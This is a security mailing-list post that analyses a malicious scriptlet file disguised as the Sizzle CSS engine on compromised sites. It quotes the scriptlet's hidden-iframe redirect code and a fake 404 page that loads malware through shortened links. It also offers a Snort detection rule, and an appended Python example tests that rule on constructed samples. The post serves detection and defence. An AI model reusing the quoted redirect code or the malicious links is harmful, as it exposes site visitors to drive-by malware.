[Snort-sigs] Malicious scriptlets

James Lay jlay at ...3266...
Thu May 16 13:16:32 EDT 2013


So I've now seen two of these so far.  Compromised site gets a bonus 
file...a .sct scriptlet file.  These files had the initial header of the 
Sizzle CSS Engine:

badsite1.com/wp-includes/js/jquery/ie.sct
badsite2.biz/wp-content/themes/2012/css/themes.sct

/*
  * Sizzle CSS Selector Engine - v0.9.3
  *  Copyright 2009, The Dojo Foundation
  *  Released under the MIT, BSD, and GPL Licenses.
  *  More information: http://sizzlejs.com/
  */

but then goes on with the below (spaces added):

<s c r i p t l e t><implements 
type=behavior></implements><script>xchk='_';xurl='\x08//goo.gl/24vi1';(xifr=document.createElement('iframe')).style.display='none';document.body.appendChild(xifr);with(xifr){id='xfid';addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){setAttribute(xchk,'_');save(xchk);expires=(new 
Date((new 
Date()).getTime()+6e8)).toUTCString();src=xurl;}}</script></scriptlet>

The shortened goo.gl link points to bls.pw/ which apparently is 
"missing" an index.* page (hat tip to ET for detecting the .pw domain 
jazz).  The response is just as icky (snippets):

<t i t l e>404 Not Found</title>
<snip>
.<h1>Not Found</h1>
.<p>The requested URL / was not found on this server.</p>
.<p>Additionally, a 404 Not Found error was encountered while trying to 
use an ErrorDocument to handle the request.</p>
.<!--[if gt IE 7]>
.<s c r i p t type="text/javascript">
.setTimeout('new Image().src="//goo.gl/9yBTe"',2500);
<snip>
...innerHTML+='<iframe/src="https://
goo.gl/1hpWA"style="position:absolute;left:-4200px;"onload="new 
Image().src=\'//goo.gl/hNVXP\'"></iframe>';
...innerHTML+='<iframe/src="https://
goo.gl/EVVWF"style="position:absolute;left:-4200px;"></iframe>';

The shortened links are currently serving up nasty jar files:

https://www.virustotal.com/en/file/c4d37ef0e60e940527061444e1575a8e555dbe91ccb7e0fb5469a9c08f94de0f/analysis/1368718511/

Sig below should catch the response from the compromised server:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISED Scriptlet file with iframe redirect"; 
flow:from_server,established; file_data; content:"<scriptlet"; 
content:"url="; content:"iframe"; metadata:policy balanced-ips drop, 
policy security-ips drop, service http; metadata:ruleset community; 
classtype:trojan-activity; sid:10000060; rev:1)

Anything to help make the sig better would be much appreciated.

James
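An added example, not part of James's post or any Snort code: it emulates the three file_data content checks of the rule above over constructed response bodies, to show what the signature as written catches and what it misses. The sample bodies, the hostnames and the URLs are all constructed placeholders, not the ones from the post.

```python
# Added example (not from the original post): emulate the rule's three
# file_data content checks over constructed HTTP response bodies.
# A Snort 'content' match is a plain byte substring search; without
# 'nocase' it is case-sensitive, and without distance/within the
# patterns need not appear in any particular order.

RULE_CONTENTS = (b"<scriptlet", b"url=", b"iframe")

# Constructed samples. Hostnames and paths are placeholders.
SCRIPTLET_BODY = (
    b"/*\n * Sizzle CSS Selector Engine - v0.9.3\n */\n"
    b"<scriptlet><implements type=behavior></implements>"
    b"<script>xurl='//example.invalid/redirect';"
    b"(xifr=document.createElement('iframe')).style.display='none';"
    b"</script></scriptlet>"
)
# Same payload with an upper-case opening tag (IE treats tag names case-insensitively).
UPPERCASE_BODY = SCRIPTLET_BODY.replace(b"<scriptlet", b"<SCRIPTLET")
# Ordinary page that happens to contain both "iframe" and "url=".
BENIGN_BODY = (
    b"<html><body><iframe src=\"/ads\"></iframe>"
    b"<a href=\"/?url=home\">home</a></body></html>"
)
# The legitimate Sizzle header on its own.
SIZZLE_ONLY = b"/*\n * Sizzle CSS Selector Engine - v0.9.3\n */\nfunction Sizzle(){}"


def content_match(body: bytes, pattern: bytes, nocase: bool = False) -> bool:
    """One Snort 'content' check: substring search, optionally case-insensitive."""
    if nocase:
        return pattern.lower() in body.lower()
    return pattern in body


def rule_matches(body: bytes, nocase: bool = False) -> bool:
    """True when every content pattern of the sid:10000060 rule is present."""
    return all(content_match(body, p, nocase) for p in RULE_CONTENTS)


def evaluate_samples(nocase: bool = False) -> dict:
    """Run the rule over all constructed samples; returns sample name -> alert?"""
    return {
        "scriptlet": rule_matches(SCRIPTLET_BODY, nocase),
        "uppercase": rule_matches(UPPERCASE_BODY, nocase),
        "benign": rule_matches(BENIGN_BODY, nocase),
        "sizzle_only": rule_matches(SIZZLE_ONLY, nocase),
    }


if __name__ == "__main__":
    print("as written  :", evaluate_samples())
    print("with nocase :", evaluate_samples(nocase=True))
```

Running it shows the rule as written misses an upper-case `<SCRIPTLET` tag unless `nocase` is added to that content, while the Sizzle header contributes nothing to the match and the benign page does not alert.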